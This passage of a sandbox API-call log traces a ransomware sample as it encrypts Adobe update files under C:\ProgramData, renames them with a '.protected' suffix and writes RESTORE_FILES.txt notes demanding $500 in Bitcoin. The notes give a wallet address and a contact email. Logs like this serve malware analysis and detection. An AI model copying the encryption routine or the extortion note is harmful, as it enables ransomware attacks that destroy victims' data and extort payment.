(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.701] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0064.701] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.701] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0064.701] CloseHandle (hObject=0xb4) returned 1 [0064.701] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0064.701] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0064.702] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 50 [0064.702] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0064.702] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.702] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0064.702] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.703] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0064.703] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.703] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0064.703] CloseHandle (hObject=0xa4) returned 1 [0064.703] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="Windows") returned -1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="Program Files") returned -1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="Program Files (x86)") returned -1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="$Recycle.bin") returned 1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="System Volume Information") returned -1 [0064.703] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM") returned 28 [0064.703] lstrcmpW (lpString1="ARM", lpString2=".") returned 1 [0064.703] lstrcmpW (lpString1="ARM", lpString2="..") returned 1 [0064.703] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*") returned 30 [0064.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0064.703] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.703] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.703] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.703] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.703] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.704] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\.") returned 30 [0064.704] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.704] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.704] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.704] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.704] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.704] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.704] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.704] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\..") returned 31 [0064.704] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.704] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Windows") returned -1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Program Files") returned 1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Program Files (x86)") returned 1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="$Recycle.bin") returned 1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="System Volume Information") returned -1 [0064.704] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0") returned 42 [0064.704] lstrcmpW (lpString1="Reader_10.0.0", lpString2=".") returned 1 [0064.704] lstrcmpW (lpString1="Reader_10.0.0", lpString2="..") returned 1 [0064.704] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*") returned 44 [0064.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0064.734] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.734] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.734] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.734] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.734] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.734] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\.") returned 44 [0064.734] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.734] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.735] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.735] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.735] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.735] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.735] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\..") returned 45 [0064.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.735] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="Windows") returned -1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="Program Files") returned -1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="Program Files (x86)") returned -1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="$Recycle.bin") returned 1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="System Volume Information") returned -1 [0064.735] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 65 [0064.735] StrStrIW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".protected") returned 0x0 [0064.735] lstrcmpW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="RESTORE_FILES.txt") returned -1 [0064.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0064.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0064.735] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0064.736] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 65 [0064.736] StrStrW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".txt") returned 0x0 [0064.736] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 65 [0064.736] StrStrW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".rar") returned 0x0 [0064.736] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 65 [0064.736] StrStrW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".zip") returned 0x0 [0064.736] ReadFile (in: hFile=0xd4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.738] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.738] WriteFile (in: hFile=0xd4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.739] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.739] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0064.739] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0064.739] CloseHandle (hObject=0xd4) returned 1 [0064.740] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.protected") returned 75 [0064.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.protected" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.protected")) returned 1 [0064.740] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="Windows") returned -1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="Program Files") returned -1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="Program Files (x86)") returned -1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="$Recycle.bin") returned 1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="System Volume Information") returned -1 [0064.741] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 66 [0064.741] StrStrIW (lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".protected") returned 0x0 [0064.741] lstrcmpW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="RESTORE_FILES.txt") returned -1 [0064.741] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0064.741] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0064.741] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0064.741] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 66 [0064.741] StrStrW (lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".txt") returned 0x0 [0064.741] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 66 [0064.741] StrStrW (lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".rar") returned 0x0 [0064.741] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 66 [0064.741] StrStrW (lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".zip") returned 0x0 [0064.741] ReadFile (in: hFile=0xd4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.753] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.753] WriteFile (in: hFile=0xd4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.754] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.754] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0064.755] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0064.755] CloseHandle (hObject=0xd4) returned 1 [0064.755] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.protected") returned 76 [0064.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.protected" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.protected")) returned 1 [0064.756] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="Windows") returned -1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="Program Files") returned -1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="Program Files (x86)") returned -1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="$Recycle.bin") returned 1 [0064.756] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="System Volume Information") returned -1 [0064.756] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 66 [0064.756] StrStrIW (lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".protected") returned 0x0 [0064.756] lstrcmpW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="RESTORE_FILES.txt") returned -1 [0064.756] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0064.756] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0064.756] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0064.756] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 66 [0064.756] StrStrW (lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".txt") returned 0x0 [0064.756] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 66 [0064.756] StrStrW (lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".rar") returned 0x0 [0064.756] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 66 [0064.756] StrStrW (lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".zip") returned 0x0 [0064.757] ReadFile (in: hFile=0xd4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.780] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.780] WriteFile (in: hFile=0xd4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.782] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.782] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0064.783] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0064.783] CloseHandle (hObject=0xd4) returned 1 [0064.786] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.protected") returned 76 [0064.786] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.protected" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.protected")) returned 1 [0064.787] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0064.787] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0064.787] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt") returned 60 [0064.787] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.787] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: 